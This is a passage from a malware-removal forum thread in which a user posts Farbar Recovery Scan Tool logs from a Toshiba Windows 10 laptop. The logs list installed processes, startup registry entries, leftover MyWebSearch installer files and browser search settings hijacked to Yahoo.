2012-01-24 15:20 - 2012-01-24 15:20 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(13f4b968).exe
2012-01-30 16:56 - 2012-01-30 16:56 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1462a399).exe
2011-12-19 00:06 - 2011-12-19 00:06 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1475ab09).exe
2011-08-17 09:36 - 2011-08-17 09:36 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(14c57403).exe
2011-09-04 17:44 - 2011-09-04 17:44 - 0075456 _____ (MyWebSearch.com) C:\Users\Lexi\AppData\Local\My Web Search Installer(191ae0ef).exe
2011-11-15 19:36 - 2011-11-15 19:36 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1bd14184).exe
2011-08-30 08:09 - 2011-08-30 08:09 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1e0d189c).exe
2011-11-22 02:21 - 2011-11-22 02:21 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1fa4da4d).exe
2011-12-31 02:31 - 2011-12-31 02:31 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(2138ca7d).exe
2012-01-18 10:47 - 2012-01-18 10:47 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(23633e70).exe
2011-09-28 21:30 - 2011-09-28 21:30 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(241d11a9).exe
2012-01-20 11:14 - 2012-01-20 11:14 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(2dc97e34).exe
2011-09-10 09:35 - 2011-09-10 09:35 - 0075456 _____ (MyWebSearch.com) C:\Users\Lexi\AppData\Local\My Web Search Installer(3641cf4c).exe
2011-08-23 22:07 - 2011-08-23 22:07 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(365b465f).exe
2011-10-11 17:07 - 2011-10-11 17:07 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(386da867).exe
2011-08-24 08:46 - 2011-08-24 08:46 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(38a4d5bf).exe
2011-11-26 23:50 - 2011-11-26 23:50 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(38da5692).exe
2011-11-28 06:12 - 2011-11-28 06:12 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(3f5e903a).exe
2011-10-13 15:47 - 2011-10-13 15:47 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(42715212).exe
2011-11-29 23:40 - 2011-11-29 23:40 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(48441ffa).exe
2011-11-30 23:09 - 2011-11-30 23:09 - 0091712 _____ (MyWebSearch.com) C:\Users\Lexi\AppData\Local\My Web Search Installer(4d4e5d71).exe
2012-01-08 22:18 - 2012-01-08 22:18 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(4eaa8c83).exe
2012-01-11 01:03 - 2012-01-11 01:03 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(598e1f87).exe
2011-12-03 12:09 - 2011-12-03 12:09 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(5a656a9f).exe
2011-12-05 16:58 - 2011-12-05 16:58 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(65babd0e).exe
2011-12-06 19:09 - 2011-12-06 19:09 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(6b589e26).exe
2011-12-14 21:46 - 2011-12-14 21:46 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(951b3e56).exe
2010-09-04 17:23 - 2010-10-02 09:49 - 0000000 _____ () C:\Users\Lexi\AppData\Local\Okaducenafi.bin
2010-09-04 17:23 - 2010-10-02 15:59 - 0000120 _____ () C:\Users\Lexi\AppData\Local\Vvoqitamewiga.dat
2014-08-29 14:20 - 2014-08-29 14:20 - 0000000 _____ () C:\Users\Lexi\AppData\Local\{56FEC2D8-8D9A-4EBB-8F41-2EA297B30509}
2011-01-22 13:59 - 2011-01-22 13:59 - 0000056 ____H () C:\ProgramData\ezsidmv.dat
2011-07-02 19:22 - 2011-07-02 19:22 - 0000188 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc

Files to move or delete:
====================
C:\Users\Lexi\FileThisDesktopInstaller.exe


Some files in TEMP:
====================
C:\Users\Lexi\AppData\Local\Temp\Foxit Updater.exe
C:\Users\Lexi\AppData\Local\Temp\Runner.exe
C:\Users\Lexi\AppData\Local\Temp\sqlite-3.7.2-sqlitejdbc.dll


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-03-07 13:33

==================== End of FRST.txt ============================

Link to post
Share on other sites

Here is my second run:

FRST

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by Lexi (administrator) on DURABLE (08-03-2016 22:56:04)
Running from C:\Users\Lexi\Downloads
Loaded Profiles: Lexi (Available Profiles: Lexi & DefaultAppPool)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RTKAUDIOSERVICE64.EXE
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Apple Inc.) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
() C:\Program Files (x86)\Fast Free Converter\FastFreeConverterUpdt.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe
(LeapFrog Enterprises, Inc.) C:\Program Files (x86)\LeapFrog\LeapFrog Connect\CommandService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmoothView\SmoothView.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\Teco.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmartFaceV\SmartFaceVWatcher.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\BulletinBoard\TosNcCore.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe
() C:\Program Files\TOSHIBA\FlashCards\Hotkey\TCrdKBB.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(PFU LIMITED) C:\Program Files (x86)\PFU\ScanSnap\CardMinder\CardLauncher.exe
(Amazon Digital Services, LLC.) C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\AmazonCloudDrive.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe
(Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe
(LeapFrog Enterprises, Inc.) C:\Program Files (x86)\LeapFrog\LeapFrog Connect\Monitor.exe
(LG Electronics) C:\ProgramData\LGMOBILEAX\BYR_Client\VZWUAAgent.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHWMsg.exe
(Sun Microsystems, Inc.) C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\LocalServiceJre\bin\AmazonCloudDriveW.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\ActionUriServer.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [16174328 2015-09-28] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1411840 2015-09-28] (Realtek Semiconductor)
HKLM\...\Run: [ThpSrv] => C:\windows\system32\thpsrv /logon
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [505696 2009-11-06] (TOSHIBA Corporation)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [52600 2009-03-09] (TOSHIBA Corporation)
HKLM\...\Run: [smoothView] => C:\Program Files\Toshiba\SmoothView\SmoothView.exe [508216 2009-07-28] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [913720 2010-03-25] (TOSHIBA Corporation)
HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1489760 2010-04-06] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [705368 2010-02-23] (TOSHIBA Corporation)
HKLM\...\Run: [smartFaceVWatcher] => C:\Program Files\Toshiba\SmartFaceV\SmartFaceVWatcher.exe [238080 2009-10-19] (TOSHIBA Corporation)
HKLM\...\Run: [TosVolRegulator] => C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe [24376 2009-11-11] (TOSHIBA Corporation)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [709976 2010-02-05] (TOSHIBA Corporation)
HKLM\...\Run: [TosNC] => C:\Program Files\Toshiba\BulletinBoard\TosNcCore.exe [595816 2010-03-19] (TOSHIBA Corporation)
HKLM\...\Run: [TosReelTimeMonitor] => C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe [35672 2010-03-03] (TOSHIBA Corporation)
HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944648 2015-06-12] (Synaptics Incorporated)
HKLM-x32\...\Run: [KeNotify] => C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe [34160 2009-12-25] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [HWSetup] => C:\Program Files\TOSHIBA\Utilities\HWSetup.exe [423936 2010-03-04] (TOSHIBA Electronics, Inc.)
HKLM-x32\...\Run: [sVPWUTIL] => C:\Program Files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe [352256 2010-02-22] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [TWebCamera] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2454840 2010-02-24] (TOSHIBA CORPORATION.)
HKLM-x32\...\Run: [TSleepSrv] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe [252728 2010-03-17] (TOSHIBA)
HKLM-x32\...\Run: [NortonOnlineBackupReminder] => C:\Program Files (x86)\TOSHIBA\Toshiba Online Backup\Activation\TobuActivation.exe [529256 2009-08-10] (Toshiba)
HKLM-x32\...\Run: [secure Online Account Numbers] => C:\Program Files (x86)\Discover\SOAN\DiscoverSOAN.exe [376832 2010-03-05] (Orbiscom Ltd. All rights reserved.)
HKLM-x32\...\Run: [brMfcWnd] => C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe [1159168 2009-05-26] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [ControlCenter3] => C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe [114688 2008-12-24] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [scanSnap WIA Service Checker] => C:\windows\SSDriver\fi5110\SsWiaChecker.exe
HKLM-x32\...\Run: [Monitor] => C:\Program Files (x86)\LeapFrog\LeapFrog Connect\Monitor.exe [118272 2014-07-11] (LeapFrog Enterprises, Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2011-07-05] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [421736 2011-08-19] (Apple Inc.)
HKLM-x32\...\Run: [bYRUA_AGENT] => C:\ProgramData\LGMOBILEAX\BYR_Client\VZWUAAgent.exe [380024 2012-09-24] (LG Electronics)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1085656 2015-12-13] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [NoSetActiveDesktop] 0
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [GoogleChromeAutoLaunch_AC2BF96DE3E4AFDBE25411FD527B2AD1] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [746648 2016-02-17] (Google Inc.)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [FileThis Fetch] => C:\Program Files (x86)\FileThis\FileThis Fetch\FileThis Fetch.exe [350208 2013-05-24] (FileThis)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-05-28] (Google Inc.)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [skitch] => C:\Program Files (x86)\Evernote\Skitch\Skitch.exe [4304704 2013-08-09] (Evernote)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Policies\Explorer: [NoSetActiveDesktop] 0
AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC64Loader.dll => No File
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Amazon Unbox.lnk [2012-12-12]
ShortcutTarget: Amazon Unbox.lnk -> C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientSystemTray.exe (Amazon.com)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Audible Download Manager.lnk [2010-09-24]
ShortcutTarget: Audible Download Manager.lnk -> C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe (Audible, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\BodyMedia Sync.lnk [2013-01-17]
ShortcutTarget: BodyMedia Sync.lnk -> C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe (BodyMedia, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CardMinder Viewer.lnk [2011-07-19]
ShortcutTarget: CardMinder Viewer.lnk -> C:\Program Files (x86)\PFU\ScanSnap\CardMinder\CardLauncher.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Conversion to PDF with ScanSnap Organizer.lnk [2011-07-19]
ShortcutTarget: Conversion to PDF with ScanSnap Organizer.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Organizer\PfuSsOrgOcrChk.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ScanSnap Manager.lnk [2013-05-28]
ShortcutTarget: ScanSnap Manager.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe (PFU LIMITED)
Startup: C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Amazon Cloud Drive.lnk [2016-03-08]
ShortcutTarget: Amazon Cloud Drive.lnk -> C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\AmazonCloudDrive.exe (Amazon Digital Services, LLC.)
Startup: C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EvernoteClipper.lnk [2015-07-31]
ShortcutTarget: EvernoteClipper.lnk -> C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0377792b-7629-45e2-ae76-3047b41ccf06}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{69348f7a-a204-4307-bdbe-d51a41143651}: [DhcpNameServer] 10.0.5.3 10.0.5.2

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/redirectdomain?brand=TSNA&bmod=TSNA
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Start Page Restore = hxxp://www.google.com/calendar/render?hl=en&tab=wc&gsessionid=pOBMFiDq2Uvgtsn9Tik9KQ
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.facebook.com/
hxxps://www.google.com/calendar/render?hl=en&tab=wc&pli=1&gsessionid=OK
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.google.com/ie
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com/ie
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
URLSearchHook: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 - (No Name) - {8bdea9d6-6f62-45eb-8ee9-8a81af0d2f94} - No File
SearchScopes: HKLM -> DefaultScope {60C66211-88F6-486E-8303-B0B10E4FD293} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
SearchScopes: HKLM -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM -> {60C66211-88F6-486E-8303-B0B10E4FD293} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
SearchScopes: HKLM-x32 -> DefaultScope {B1243C39-DE64-4E02-BC80-265B7BD496B1} URL =
SearchScopes: HKLM-x32 -> {56256A51-B582-467e-B8D4-7786EDA79AE0} URL = hxxp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=ZUxdm080YYus&ptb=v2P0GRVCoTDCO9CyDZdlcg&ind=2011061422&ptnrS=ZUxdm080YYus&si=CN6I_MvxtqkCFcJ05QodXBLK-A&n=77de5cae&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKLM-x32 -> {9D2BF1CD-96EB-4EA4-9D12-EEAA66D4FC8D} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
